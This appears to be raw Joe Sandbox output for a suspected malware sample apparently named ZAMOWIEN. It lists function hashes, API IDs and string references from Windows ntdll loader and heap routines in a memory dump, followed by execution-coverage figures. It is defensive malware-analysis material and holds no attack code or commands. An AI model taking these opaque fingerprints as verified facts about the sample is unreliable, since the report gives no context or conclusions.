                                                                            • Instruction ID: fc7f4deff489ac3834a86976f8ec4c4b57c8c3fd0da01d75a1787b058b5affb3
                                                                            • Opcode Fuzzy Hash: 2c08b11d669834ba288fdcde6ab1eefaa019da339b6ce859fcd03ee9ade38ac2
                                                                            • Instruction Fuzzy Hash: CE2153BE900119ABDB21DE69CC50AAE7BE8AF54744F440116E955E3204EF30E9118BA1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 3446177414-3610490719
                                                                            • Opcode ID: c776ea4110c3264134c12d29839e31538c22e2e000ca532b67c334f6c03ab54b
                                                                            • Instruction ID: 349e5834fd38f9d8c44da3a475b38f1ab638fbc4012385edc7f4ab8f8545d688
                                                                            • Opcode Fuzzy Hash: c776ea4110c3264134c12d29839e31538c22e2e000ca532b67c334f6c03ab54b
                                                                            • Instruction Fuzzy Hash: DE913579704741DFE716CF28C884B2AB7A5BF41784F004459E956AFA90DF74E842CBE2
                                                                            APIs
                                                                            Strings
                                                                            • LdrpCheckModule, xrefs: 3285A117
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 3285A10F
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 3285A121
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-161242083
                                                                            • Opcode ID: f9f04c2b749ce3a018e194cbec737713c0bf866c532f623c8df67b335bff36f0
                                                                            • Instruction ID: 6afc3749d87d6fea17741e2a7314b2991206b2df0342a6e349aedbf376296101
                                                                            • Opcode Fuzzy Hash: f9f04c2b749ce3a018e194cbec737713c0bf866c532f623c8df67b335bff36f0
                                                                            • Instruction Fuzzy Hash: CA719F78A00209DFEB09DF69CD80BAEB7F5FB48304F144469D916EB290E774A986CF50
                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 328C8B03
                                                                            • RtlDebugPrintTimes.NTDLL ref: 328C8B5B
                                                                              • Part of subcall function 32832B60: LdrInitializeThunk.NTDLL ref: 32832B6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes$InitializeThunk
                                                                            • String ID: $File
                                                                            • API String ID: 1259822791-2412145507
                                                                            • Opcode ID: bff601f6e65d941d3361e5ae1fcacd9ed304e777cb3003ed04c252c6cd27ad31
                                                                            • Instruction ID: a4ad4da26bb0a816c0fd267fe7e6e7c6105a21030f355b034ebb88ee3bad2425
                                                                            • Opcode Fuzzy Hash: bff601f6e65d941d3361e5ae1fcacd9ed304e777cb3003ed04c252c6cd27ad31
                                                                            • Instruction Fuzzy Hash: B961AF75A5122CABDB278F28DC41BE9B7B9AB48704F4045E9E609E7181DB709F84CF50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 3446177414-2283098728
                                                                            • Opcode ID: 5c61ba3068ec0118fbacc13eb31b6ca0a678184a025dcd34ed7962bf32df5df7
                                                                            • Instruction ID: eded325b1e738da02153aae15239ea37a09fabcc102216e38db2f2f418141a6c
                                                                            • Opcode Fuzzy Hash: 5c61ba3068ec0118fbacc13eb31b6ca0a678184a025dcd34ed7962bf32df5df7
                                                                            • Instruction Fuzzy Hash: 6151067D704701AFE715DF28C884B29B7A1BB84314F14066DE8AB9B2D5DBB0B846CB91
                                                                            APIs
                                                                            Strings
                                                                            • Failed to reallocate the system dirs string !, xrefs: 328682D7
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 328682E8
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 328682DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-1783798831
                                                                            • Opcode ID: e4e11ea286f9cb8c727701142d4c91bfdac19ffc49a4e981e6f5727097b8e6f8
                                                                            • Instruction ID: 960cc37031ea76a208afb176f6414df6723c6aef4ad868cb9656809ad61f061d
                                                                            • Opcode Fuzzy Hash: e4e11ea286f9cb8c727701142d4c91bfdac19ffc49a4e981e6f5727097b8e6f8
                                                                            • Instruction Fuzzy Hash: C041F2B9562310EFD720DF28CC40B6B77E8BF45754F01492AB958A7290EBB1D881CB91
                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32867B7F
                                                                            • RTL: Re-Waiting, xrefs: 32867BAC
                                                                            • RTL: Resource at %p, xrefs: 32867B8E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: 5d308533dddee7f996d71ae072493678cb643c0cd4c34d7b81e281586077bcab
                                                                            • Instruction ID: 5dbda9087bd4edb94e7343b4ad8c91a317ea9fc80002fcf910c374c9137d6a44
                                                                            • Opcode Fuzzy Hash: 5d308533dddee7f996d71ae072493678cb643c0cd4c34d7b81e281586077bcab
                                                                            • Instruction Fuzzy Hash: 9841133D7027028FE714CE29C840B6AB7E5EF98324F000A2DF969DB680DB70E845CB91
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3286728C
                                                                            Strings
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32867294
                                                                            • RTL: Re-Waiting, xrefs: 328672C1
                                                                            • RTL: Resource at %p, xrefs: 328672A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: c5b6d3118ee9188976fe4d41db0f66c3a613051542923b2bd742213dfb8ce22f
                                                                            • Instruction ID: 6075cd61074ccc768c4fb7cbdb3600dfc544a39376bf24b402bf0a6b0102a64b
                                                                            • Opcode Fuzzy Hash: c5b6d3118ee9188976fe4d41db0f66c3a613051542923b2bd742213dfb8ce22f
                                                                            • Instruction Fuzzy Hash: CC41DE3D601346AFE710CE29CC81B66B7A5FF54718F104619FE69AB280DB71E896CBD0
                                                                            APIs
                                                                            Strings
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32874888
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 32874899
                                                                            • LdrpCheckRedirection, xrefs: 3287488F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 3446177414-3154609507
                                                                            • Opcode ID: 707ba5b38e2c8aaf3c7afd995fa561e7c41e224d1c542ab44305c64757ce014a
                                                                            • Instruction ID: a1d8d0087a9966ed17c7a233cf24a4388f33246b5b1df49db6696fb976c59256
                                                                            • Opcode Fuzzy Hash: 707ba5b38e2c8aaf3c7afd995fa561e7c41e224d1c542ab44305c64757ce014a
                                                                            • Instruction Fuzzy Hash: 7541AD7EA053A8DFDB11CE6C8840A567BF4AF89794F010669ECD8AB351DB31D800CB91
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 1c03b4da94d137c0e78f8d4aceeadc2d6b2b02857c526058e3396a41a3804129
                                                                            • Instruction ID: 8b8078ef8fed5794bc1bb424cc928da8b3fd526a1ab8989e11b9f57f4049287e
                                                                            • Opcode Fuzzy Hash: 1c03b4da94d137c0e78f8d4aceeadc2d6b2b02857c526058e3396a41a3804129
                                                                            • Instruction Fuzzy Hash: 6D31847A9002299FDB20CE28CC50BEF77F8FF45754F844556E849E3244EF309A558BA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Wow64 Emulation Layer
                                                                            • API String ID: 3446177414-921169906
                                                                            • Opcode ID: 43d4a69561a1f2d732a4013794be3d410e8b8646b9bf186fef99ac8f30f70c2d
                                                                            • Instruction ID: 948fa9dbbcf3006d2867398e3bd73ada9dc31b81723ce8085c8bd03084cb0196
                                                                            • Opcode Fuzzy Hash: 43d4a69561a1f2d732a4013794be3d410e8b8646b9bf186fef99ac8f30f70c2d
                                                                            • Instruction Fuzzy Hash: 65214AB990111DBFEB019EA8CC84DFF7B7DEF447D8B004464FA15A6140DA749E069F60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: e2193629933111cae726056ff3f42f67e4a79d0966e8dc0018b7e90776a750e3
                                                                            • Instruction ID: 525be48f8dacc785aa0b2337234d79f2200354f89cd4677515580039f6bcc0bd
                                                                            • Opcode Fuzzy Hash: e2193629933111cae726056ff3f42f67e4a79d0966e8dc0018b7e90776a750e3
                                                                            • Instruction Fuzzy Hash: CCE15175A40319AFDB15CFA4D881BEEFBB8BF44354F10852AEA15EB280D770EA45CB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9b7af6436fa81f3ce9fc3b855d1c27f692ea96b6be3053bb74b072ff1a1dd951
                                                                            • Instruction ID: 4839e8b34cbd2ca92206dae952fe136a03a1329929fdf2b57ee91dda547923e4
                                                                            • Opcode Fuzzy Hash: 9b7af6436fa81f3ce9fc3b855d1c27f692ea96b6be3053bb74b072ff1a1dd951
                                                                            • Instruction Fuzzy Hash: FAE103B8D00708DFDB25CFA9C980A8DBBF1FF58354F20456AE959A76A1DB70A841CF50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: c27c0f256558b3a026338a63302930503eb8af3c097526c48409916782ac04e3
                                                                            • Instruction ID: 167359068aa39e35fe10a90e9503715f1f0833de8aef9170603de6a6474bc82e
                                                                            • Opcode Fuzzy Hash: c27c0f256558b3a026338a63302930503eb8af3c097526c48409916782ac04e3
                                                                            • Instruction Fuzzy Hash: 5C712979E002199FDF05CFA8C980BEDBBB5BF58358F14406AEA06EB254DB749905CB90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 5ef5a8c678b8e3e3e79f274eef830aeb5eb3b250a0e302a0438d4ced9fcb2b5e
                                                                            • Instruction ID: d99d62e3e74566a540ef6c0b960787cb2982a38748b840fdf845ec32296f019a
                                                                            • Opcode Fuzzy Hash: 5ef5a8c678b8e3e3e79f274eef830aeb5eb3b250a0e302a0438d4ced9fcb2b5e
                                                                            • Instruction Fuzzy Hash: 2D516A7D7016269FEB08CE98C9A4A99B7F1FB88354B10816DD90ADB750DB74EC41CB80
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: b77068c656dc8df936b78854b5a8809405847b51f9425dc5ef018f05df796777
                                                                            • Instruction ID: 37518e5ef1e19f2c9f3a0ccbf3051e35621e22865de122c1ee9e3b099643111b
                                                                            • Opcode Fuzzy Hash: b77068c656dc8df936b78854b5a8809405847b51f9425dc5ef018f05df796777
                                                                            • Instruction Fuzzy Hash: A95139B9D00219DFDF04CF98C941AEDBBB1BF58358F18812AEA16BB250DB789941CF54
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                            • String ID:
                                                                            • API String ID: 4281723722-0
                                                                            • Opcode ID: b01e47de60db39a8c668cbc52c99862bee4cbb6a9100aa2b76dec438e6063450
                                                                            • Instruction ID: 939150427f4c1001073b080cc7599387e3082f0ace916b07e84d148f31c13eee
                                                                            • Opcode Fuzzy Hash: b01e47de60db39a8c668cbc52c99862bee4cbb6a9100aa2b76dec438e6063450
                                                                            • Instruction Fuzzy Hash: 11316779E41228EFCF10DFA8D844BADBBB0BF08320F10452AE621B7290CB359941CF50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: d9db03fe4ccc7df22a8f7db582ffaf578ae305f2ab6909de7d7eddd0f5e581d7
                                                                            • Instruction ID: 06b1cc5c9b112902d209e4c8bd3f77f62ea5166d2cd862fd585aee8593563be6
                                                                            • Opcode Fuzzy Hash: d9db03fe4ccc7df22a8f7db582ffaf578ae305f2ab6909de7d7eddd0f5e581d7
                                                                            • Instruction Fuzzy Hash: D4325A74D08369EFEB25CF64C984BD9BBB1BB08344F0040E9D559AB341EBB65A84CF91
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                            • Instruction ID: 14c000dcc59890595e58101c3419e8d44236b33c84a1357b9f94e91522938329
                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                            • Instruction Fuzzy Hash: 3991D8BCE022099FEB16DE59C8807AE77E1BF44764F50451AEA58E76C0DB70D940CF90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$Flst
                                                                            • API String ID: 0-758220159
                                                                            • Opcode ID: 60afe8b50b56eea42adf7e0fafe3dab65f3530463ffe8e3f27f9524dd957bf48
                                                                            • Instruction ID: c6e5c78c262cff42d3b2601ac4f090c5f84e576713c3248e60eb642452183e71
                                                                            • Opcode Fuzzy Hash: 60afe8b50b56eea42adf7e0fafe3dab65f3530463ffe8e3f27f9524dd957bf48
                                                                            • Instruction Fuzzy Hash: F351DDB9E01708CFEB14CF98C884759FBF4EF44B98F14802ED5099B241EB70A985CBA0
                                                                            APIs
                                                                            Strings
                                                                            • kLsE, xrefs: 327F0540
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 327F063D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 3446177414-2547482624
                                                                            • Opcode ID: dcd4002f31d039df70188715e80c333a1dd0e90898b3e42996662e2e87f05ca1
                                                                            • Instruction ID: 7e8d7cfb40922b7933b944779ea5472d165def2842bb03931b7fc0d877e24603
                                                                            • Opcode Fuzzy Hash: dcd4002f31d039df70188715e80c333a1dd0e90898b3e42996662e2e87f05ca1
                                                                            • Instruction Fuzzy Hash: EA519CB9508752EFD714DF64C440A97B7E5BF88304F00883EE9A98B344EB769545CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: 0$0
                                                                            • API String ID: 3446177414-203156872
                                                                            • Opcode ID: a00097bb6edd9acdfe4fa80058c80f8af12f0c356f84c7d981f2b8db52684fc1
                                                                            • Instruction ID: 05d19f1f9cf0ba7050877a205271105b7e186b5b17a0fdc8e8cbb7763b8b76b6
                                                                            • Opcode Fuzzy Hash: a00097bb6edd9acdfe4fa80058c80f8af12f0c356f84c7d981f2b8db52684fc1
                                                                            • Instruction Fuzzy Hash: A3415BB56087069FD300CF28C584A1ABBE5BF8D358F04492EF989DB340D771EA06CB96

                                                                            Execution Graph

                                                                            Execution Coverage:2.5%
                                                                            Dynamic/Decrypted Code Coverage:4.2%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:449
                                                                            Total number of Limit Nodes:73
